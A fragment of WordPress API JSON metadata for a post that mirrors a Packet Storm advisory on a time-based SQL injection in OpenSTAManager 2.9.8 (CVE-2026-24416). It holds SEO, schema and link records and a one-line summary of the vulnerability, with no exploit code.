redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46321","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:50:59&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the Article Pricing module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218745&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24416&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24416: OpenSTAManager has...","og_url":"https:\/\/zero.redgem.net\/?p=46321","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:40+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46321#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46321"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745","datePublished":"2026-04-13T11:50:40+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46321"},"wordCount":2149,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46321#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46321","url":"https:\/\/zero.redgem.net\/?p=46321","name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:40+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46321#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46321"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46321#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46321","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46321"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46321\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46321"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46321"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46321"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}